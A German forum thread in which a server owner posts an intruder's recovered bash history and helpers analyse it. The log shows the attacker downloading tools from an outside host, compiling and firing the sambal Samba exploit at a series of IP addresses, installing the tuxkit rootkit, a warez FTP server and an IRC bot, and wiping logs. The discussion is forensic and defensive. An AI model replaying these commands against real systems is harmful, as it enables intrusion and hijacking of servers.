Hackbesuch

[Anonymous]

Hallo, habe auf meinem root-server unangenehmen Besuch gehabt. Ich bin gerade am reparieren. Ein wenig shell-history konnte ich retten. Hat irgendjemand eine Idee über welches Loch der .... sich hier eingeschlichen hat? Vielen Dank für Eure Mithilfe

Gruss

Volker


cd /home/www/web1/html/
ls
vi index.html
ls
vi index.html
cd /dev/tux
wget http://de.samba.org/samba/ftp/samba-2.2.8a.tar.gz
tar -zxf samba-2.2.8a.tar.gz
cd samba-2.2.8a
ls
cd source
./configure && make
cd bin
mv smbd nmbd /usr/sbin/
ps -aux
ps -aux |grep smbd
kill 343
ps -aux |grep smbd
smbd -D
logout
cd /dev/tux
ls
rm -rf samba-2.2.8a*
ls
logout
netstat
netstat -a
ls
w
who
cd /dev/tuc
cd /dev/tux
ls
vi /var/log/messages
mkdir scan
cd scan
wget retroteam.net/hack.sh
wget retroteam.net/hack
wget retroteam.net/mass
lynx hack.co.za
mv sambal.c.gz sambal.c
ls
rm sambal.c hack hack.sh
ls
./mass 141
chmod +x mass
./mass 141
./mass -S 141
./mass -S 141 &
ls
ifconfig
ls
ps -aux @grep mass
ps -aux |grep mass
kill 1252
ps -aux |grep mass
kill 428
ps -aux
kill 16158
ls
w
whp
who
cd ..
lynx hack.co.za
mv sambal.c.gz sambal.c
gcc sambal.c -o sambal
vi sambal.c
tar -z sambal.c
gunzip sambal.c
mv sambal.c sambal.gz
gunzip sambal.gz
ls
mv sambal sambal.c
gcc sambal.c -o sambal
rm sambal.c
mv sambal hack
./hack
./hack -b0 -v 217.6.59.26
./hack -b0 -v 217.6.59.242
./hack -b0 -v 217.6.60.245
./hack -b0 -v 217.6.61.250
./hack -b0 -v 217.6.67.67
./hack -b0 -v 217.6.68.242
./hack -b0 -v 217.6.73.115
./hack -b0 -v 217.6.76.110
./hack -b0 -v 217.6.80.242
./hack -b0 -v 217.6.85.138
./hack -b0 -v 217.6.85.164
./hack -b0 -v 217.6.85.168
./hack -b0 -v 217.6.85.195
w
cd scan/
./mass
./mass -d 50000 -S 4.20 > nomat &
vi nomat
ps -aux
kill 21040
cat nomat
rm nomat
ls
./mass -d 50000 -S 4.20 &
ls
cd ..
./hack -b0 -v 217.6.105.200
./hack -b0 -v 217.6.112.74
./hack -b0 -v 217.6.115.99
./hack -b0 -v 217.6.115.245
./hack -b0 -v 217.6.123.150
./hack -b0 -v 217.6.124.202
cd scan/
ls
logout
df
ls
cd /var/tmp/
ls
cd .oracle/
ls
w
cd ..
wget http://www.glftpd.org/download/glftpd-LNX_1.26beta2.tgz
ls
tar xzvf glftpd-LNX_1.26beta2.tgz
vi /dev/tux/.proc
cd ..
ls
cd games/
l
ls
mkdir pinball
cd ../tmp/glftpd-LNX_1.26
ls
vi glftpd.conf
./installgl.sh
vi /etc/inetd.conf
ls
ps
ps aux
ftp
/usr/sbin/inetd
ftp
cd /var/games/pinball/ftp-data/logs/
ls
cat xferlog
rm -rf *
site addip glftpd *@*
ftp
ps aux
vi /dev/tux/.proc
ps aux
last
ls
ps aux
cat /dev/tux/.proc
vi /dev/tux/.proc
ps aux
kill -9 3377
/usr/sbin/inetd
/usr/sbin/xinetd
xinetd
ls
ps
ps au
ps x
las
ls
cat /dev/tux/
cat /dev/tux/.proc
vi /etc/inetd.conf
ps x
ls
vi /dev/tux/.proc
ps x
kill -9 4056
kill -9 4254
kill -9 417
vi /dev/tux/.proc
/usr/sbin/inetd
ps
ps x
vi /dev/tux/.proc
ps x
ftp
logout
last
ps
ps x
ps aux
cd /root/
ls
cd Mail/
ls
cd /var/log/
ls
cat localmessages
cat xferlog
ls
cd samba/
ls
cd ..
cat warn
ls
cat lastlog
rm -rf lastlog
cat lastlog
ls
cd news/
ls
cd /var/games/pinball/ftp-data/logs/
ls
cd ../../site/incoming/
ls
rm -rf att.wav
ls
cd ..
chmod 777 incoming/
ls
cd incoming/
ls
cd Dreamcatcher.TS.Line.Dubbed.German.INTERNAL.VCD-TGSC/
ls
cd CD1/
ls
ps x
last
ftp
ps
ps aux
kill -9 5909
cd /dev/tux/.proc
cat /dev/tux/.proc
vi /dev/tux/.proc
ps aux
kill -9 26614
ps aux
kill -9 26940
kill -9 51529
ls
ps aux
kill -9 21529
ps ux
cd /var/tmp/
ls
wget http://archive.tuxtendo.nl/rootkit/tuxkit-1.0.tgz
tar xzvf tuxkit-1.0.tgz
.&tuxkit lordsuxx 4711 1710
./tuxkit lordsuxx 4711 1710
cd tuxkit
./tuxkit lordsuxx 4711 1710
vi /dev/tux/.proc
ps x
kill -9 28636
last
w
who
ps
kill -9 28234
kill -9 28324
who
ps x
kill -9 28363
ps x
cd /var/games/pinball/site/incoming/
ls
cd Dreamcatcher.TS.Line.Dubbed.German.INTERNAL.VCD-TGSC/
ls
ftp
ps x
cd /
ls
cd home/
ls
cd download/
ls
cd ../confixx/
ls
cd html
ls
ftp
ch /var/games/
mkdir puzzle
cd puzzle/
wget http://iroffer.org/archive/v1.2/beta/iroffer1.2b13.tgz
tar xzvf iroffer1.2b13.tgz
cd iroffer1.2b13
ls
./configure
./Configure
make
make install
ls
vi sample.config
mkdir /var/games/puzzle
cd ..
mv iroffer1.2b13/ /var/games/puzzle/iroffer
cd /var/games/puzzle
ls
cd iroffer/
vi sample.config
ls
cd src
ls
cd ..
mkdir files
cd files/
ls
ls -lisa
cd ..
vi sample.config
echo hallo >> mybot.xdcc
ls
vi sample.config
./iroffer
./iroffer -b sample.config
adduser iroffer
cat sample.config
cd /root/
adduser iroffer
./adduser iroffer
/usr/sbin/adduser iroffer
vi /etc/passwd
passwd iroffer
ssh 0 -l iroffer
last
ssh 0 -l iroffer

[dodolin]

Hallo, habe auf meinem root-server unangenehmen Besuch gehabt. Ich bin gerade am reparieren.

Das ist töricht! Die einzige Möglichkeit in solchen Fällen heisst: Neu formatieren und neu installieren.

Ein wenig shell-history konnte ich retten. Hat irgendjemand eine Idee über welches Loch der .... sich hier eingeschlichen hat?

Anhand der Shell-History erkennt man lediglich, wie er sich nach und nach einen Warez-FTP und diverse Hintertürchen eingerichtet hat. Wie er reinkam, erkennst du daran nicht. Wenn schon, dann müsste das in den Logs eines deiner Dienste zu finden sein. Aber wenn der Cracker nicht gerade dämlich war, wird er alle verräterischen Logeinträge entfernt haben, wenn er schon Rootrechte besitzt.

[jtb]

nope, man sieht nicht, durch welche Sicherheitslücke der Hacker/Cracker reingekommen ist! schon sehr früh am Anfang steht cd /dev/tux ...
Auf deinem Server war aber nur ein Scriptkiddie, der keine wirkliche Ahnung hat (ansonsten hätte er an die History gedacht und manche Sachen anders gemacht)..

Aber du hast da ein nettes Rootkit drauf (Tuxkit), setze deinen Server also KOMPLETT neu auf..

btw: hast du den Traffic überprüft? Da waren einige Traffic-intensive Dienste in der History..

[floschi]

Hier biddeschön: http://www.rootforum.org/forum/viewtopic.php?t=7801 ;)

[magnus.net]

Naja, die Anschrift hat er ja schon :-)
retroteam.net --> whois
Wenn der nicht auch gehackt wurde :o
Jedenfalls hast du in gerade ertappt, rootkit! ircdccbot! backdoors! ftp!
Das hätte därbe auf deinen Traffic gehen können!
Sofort in Rescuemodus und reinstall!!!!!

[captaincrunch]

Naja, die Anschrift hat er ja schon

Wenn derjenige so blöd ist, hat er's wirklich nicht anders verdient ... wieso kommst du eigentlich auf die Idee, dass das der "Ursprung" des ganzen ist ? Wenn derjenige auch nur ein Fünkchen Hirn hätte, hat das ganze nichts mit dem "Hacker" zu tun.

Ansonsten schließ ich mich meinen Vorpostern an : ASAP eine ganz frische Installation drauf, sonst hast du noch viel länger "Spaß" mit diesen Idioten ...

[dodolin]

wget retroteam.net/hack.sh
wget retroteam.net/hack
wget retroteam.net/mass

... liefern übrigens alle 403 Forbidden, btw.

Eigentlich glaube ich ja echt nicht, dass die sooo blöd wären, die History nicht zu löschen und dann solche URLs drin zu haben. Obwohl, Skriptkiddies ist wohl sämtliche Blödheit zuzutrauen...

Es könnte aber genauso gut sein, dass deren Server vorher ebenso gehackt wurde oder dass die nur die Tools zur Verfügung stellen, mit dem Angriff aber nichts zu tun haben.

Schliesslich wären nach dieser Logik sonst auch noch

wget http://iroffer.org/archive/v1.2/beta/iroffer1.2b13.tgz
wget http://archive.tuxtendo.nl/rootkit/tuxkit-1.0.tgz
wget http://www.glftpd.org/download/glftpd-LNX_1.26beta2.tgz
wget http://de.samba.org/samba/ftp/samba-2.2.8a.tar.gz

alle verdächtig.

Weiterer Tipp an volker: Nach der Neuinstallation unbedingt alle Dienste updaten und alle Patches einspielen, sonst passiert das gleiche sofort wieder. Und eventuell reicht das nichtmal, sondern du musst deine Dienste auch noch korrekt konfigurieren. Auch hier können Fehler gemacht werden, die sich nicht einfach durch Updates ausbügeln lassen.

[Anonymous]

Danke Leute, das Neu-Aufsetzen ist schon veranlasst. Hatte ich auch vermutet, wer weiss, wo sich sonst noch etwas versteckt hält.

Meine Hoffnung war, dass jemand aus der Vorgehensweise vielleicht erkennt, welches Loch hier benutzt wurde. Wahrscheinlich bin ich nicht der einzige, der einen Root-Server in vergleichbarer Konfiguration laufen hat. Bei der Dienstekonfiguration bin ich sicherlich nicht ganz auf den Kopf gefallen - bin aber auch schlau genug zu wissen, dass man nix dicht bekommt, wenn man die Kiste auch benutzen möchte.

Gruss Volker

[captaincrunch]

Meine Hoffnung war, dass jemand aus der Vorgehensweise vielleicht erkennt, welches Loch hier benutzt wurde.

Das Problem hierbei ist, dass der Angreifer ja schon auf der Kiste war, als die Bash-History geschrieben wurde, und sich daher anhand der History nicht wirklich sagen lässt, welches Loch derjenige gefunden hat, da wären die Logs schon erheblich hilfreicher gewesen ...

[dodolin]

ACK, zum CaptainCrunch. Wenn du noch kannst, wäre es IMHO sinnig, das komplette /var/log/* zu sichern. Das sollte eigentlich der allererste Schritt sein. Dann kannst du hinterher immer noch in aller Ruhe versuchen rauszufinden, wie der Cracker auf dein System kam.

[v00dy]

hui :o
der hat ja jede menge installiert, den rootkit tuxkit in /dev/tux
dann einen dccbot für IRC.netze und glftp.

dann hat er wohl noch über deinen server andere server gehackt.
wenn du pech haste kriegst du in den nächsten wochen noch besuch von den grünen männchen...
ich würde lieber anzeige gegen unbekannt erstatten, sonst bist du am ende noch der dumme.

./hack -b0 -v 217.6.59.26
./hack -b0 -v 217.6.59.242
...

sambal.c
Remote root exploit for Samba 2.2.x and prior that works against Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x and 3.2 non-executable stack). It has a scanning abilities so a range of machines can be penetration tested at once on a network.


btw. was hat dich das an traffic gekostet?

[kase]

Hattest du Samba auf deinem Server laufen, bevor er gehackt wurde ?!

Auf jeden Fall hat er bei dir Samba installiert, und von deinem Rechner aus dann auch noch gleich ein paar andere Server gehackt, oder auch nicht ;)

Ich kann da Voody nur voll und ganz zustimmen. Solltest du vorher Samba installiert haben, war das sehr wahrscheinlich die Ursache, da du wohl ein Security Update dafür übersehen hast ;)

[asn]

Ware mal interessant, was überhaupt alles vorher auf dem Server installiert war, ggf mit welchen Patches.

Nur so als Idee, das vieleicht noch mehr Server betroofen sein könnten (Stadart-Installation mit Bug?).

Ansonsten könnte man mal versuchen nachzuvollziehen, was genau diese hack -v IP Aufrufe auf dem Zielrechner anstellen, vieleicht ist er (sie?) genau auf dem Wege auch an Deinen Server gekommen.

Alex

[oxygen]

Also ich könnte mir vorstellen, das er über das OpenSSL Exploit reingekommen ist. Da gibts schon fertige Pakete für. Einfach Range eingeben und innerhalb von Sekunden hat man ne Shell auf den Rechnern. Das kriegt jeder scriptkiddie hin.

[t-son]

ahem,

wie lang bzw. gross ist den so ne bash history vom root???

weil meine ist ziemlich kurz!!?? Das macht mir angst.. ich hab doch viel mehr als root gemacht...

[kase]

das kann man einstellen, bin mir aber jetzt nicht mehr sicher wo. Ich glaube, standart is 500 Zeilen.

[captaincrunch]

Das wird durch die Shell-Variable HISTFILESIZE geregelt. Gib mal echo $HISTFILESIZE ein, dann weißt du, wie "lang" das Teil ist ...

Btw.: Das ganze kann auch ganz nützlich sein, wenn man z.B. (aus welchen Gründen auch immer) sein Passwort auf der Konsole eingegeben hat. Mit einem HISTFILESIZE=0, sind beim nächsten Einloggen keinerlei Einträge mehr vorhanden.
Alleine aus diesem Grund macht das ganze Vorhaben des OP auch keinen Sinn ...

[t-son]

Danke fuer die schnellen Antworten.

...ist auf 500 gestellt, aber keine 500 Zeilen lang...

kann ich das auch so irgendwie zerhauen/zurückgesetzt hab??

Kann sonst keine Veränderung feststellen... (Plattenplatz, traffic, zus. User, gestartete Dienste usw.)

Find ich nu irgendwie seltsam...

[banshy]

wget retroteam.net/hack.sh
wget retroteam.net/hack
wget retroteam.net/mass

... liefern übrigens alle 403 Forbidden, btw.

nö ;o) funktionieren wunderbar

[coolsurfer]

Tja, dann ist ja auch relativ klar, wie der Freund auf den Server kam :-D

"-p <port> port to attack (default = 139)"
und "samba-2.2.5 - OpenBSD 3.2 (package..."

aus dem Code von "hack" sprechen wohl eine eindeutige Sprache...
Oder hattest du keinen Samba-Server laufen ?

coolsurfer

[captaincrunch]

Oder hattest du keinen Samba-Server laufen ?

Würde mich jetzt auch mal interessieren ... vor allem, da ja letztlich noch jemand im Datentransfer & Backup meinte, unbedingt samba auf dem Rootie laufen lassen zu müssen ...

Aber selbst wenn er über eine andere Lücke reingekommen ist, sagt das eigentlich nur, dass derjenige versucht hat, über die Kiste andere zu knacken ...

[sfeni]

wget retroteam.net/hack.sh
wget retroteam.net/hack
wget retroteam.net/mass

... liefern übrigens alle 403 Forbidden, btw.

nö ;o) funktionieren wunderbar

Das sind aber nicht die Tools, die er benutzt hat.
Schaut euch mal das an:

Code: Select all

...
wget retroteam.net/hack.sh 
wget retroteam.net/hack 
wget retroteam.net/mass 
lynx hack.co.za 
mv sambal.c.gz sambal.c 
ls 
rm sambal.c hack hack.sh 
ls 
./mass 141 
chmod +x mass 
./mass 141 
./mass -S 141 
./mass -S 141 & 
ls 
ifconfig 
ls 
ps -aux @grep mass 
ps -aux |grep mass 
kill 1252 
ps -aux |grep mass 
kill 428 
ps -aux 
kill 16158 
ls 
w 
whp 
who 
cd .. 
lynx hack.co.za 
mv sambal.c.gz sambal.c 
gcc sambal.c -o sambal 
vi sambal.c 
tar -z sambal.c 
gunzip sambal.c 
mv sambal.c sambal.gz 
gunzip sambal.gz 
ls 
mv sambal sambal.c 
gcc sambal.c -o sambal 
rm sambal.c 
mv sambal hack 
./hack 
./hack -b0 -v 217.6.59.26
...

Zuerst lädt er diese komischen Tools von retroteam.net und dann löscht er sie gleich wieder. danach surft er mit lynx auf einer page, wo er sich wahrscheinlich die datei sambal.c.gz gesaugt hat und diese benennt er dann in hack um.

EDIT:
Habe gerade ein wenig gegoogled, dabei bin ich auf diesen Link gestoßen. Da gibts dieses sambal.c
http://packetstorm.linuxsecurity.com/exploits20.shtml
Und die Entwickler von diesem sambal.c (steht auf der obigen Page)
Die scheinen es echt drauf zu haben, die haben ne ganze Menge im Angebot. Holländer und Belgier :-)
http://www.netric.org

Dieses Exploit sambal.c ist für die Version 2.2.8 von samba.
Debain stable hat Package: samba 2.2.3a-12.3 [security]
Da werden sich wohl einige schützen müssen, die samba drauf haben. Ich Gott sei dank nicht.

Werde das daheim mal testen auf meinem debian, da hab ich samba drauf.

[sfeni]

Da derjenige, der das gehacked hat, wissen musste, dass diese 3 dateien auf retroteam.net liegen, hab ich mal versucht herauszubekommen, wem diese domain gehört.
Folgendes habe ich herausgefunden:

Code: Select all

whois auf retroteam.net

Die Telefon- und Faxnummer ist schon komisch, findet ihr nicht auch?
Aber die Adresse gibt es (http://www.map24.de, einfach als Straße Sachs eingeben).

[Edit von dodolin: Den whois Output kann jeder selbst nachschauen. Solche persönlichen Daten sollte man aus Datenschutzgründen nicht ohne Einverständnis der jeweiligen Personen veröffentlichen. Bei Denic ist es AFAIK sogar komplett verboten, bei INTERNIC weiss ich es nicht.]
[Edit von sfeni: Danke, hab ich nicht dran gedacht.]

[sfeni]

habe nun dieses sambal getestet, scheint nur bei der version 2.2.8 zu funktionieren, habe 2.2.3a-12.3 for Debian installiert. Da geht das nicht.

EDIT:
Dieses "mass" ist ein Scanner, der das Netzwerk nach Samba absucht.

EDIT2:
Ein Monolog hier *g*
http://www.debian.org/security/2003/dsa-280

[Anonymous]

Hallo,

sorry, war ein paar Tage offline. Also: auf dem Rechner lief tatsächlich ein samba vorher (jetzt nicht mehr). Asche auf mein Haupt, dass ich mit den Patches sicherlich nicht up-to-date war. Trost: patches reagieren in der Regel nur auf Löcher, die schon bekannt sind - somit ist der neueste Patch Stand zwar Pflicht, aber keinesfalls mit Sicherheit gleichzusetzen.

Und eine Info für alle, die die Warnungen hier noch nicht ganz verstanden haben: an einem Tag hat die ganze Aktion ein Transfervolumen von 25GB verschlungen. Zum Glück habe ich den Hack noch am ersten Tag entdeckt, somit blieb ich mit dem Rechner im Freivolumen.

Gruss Volker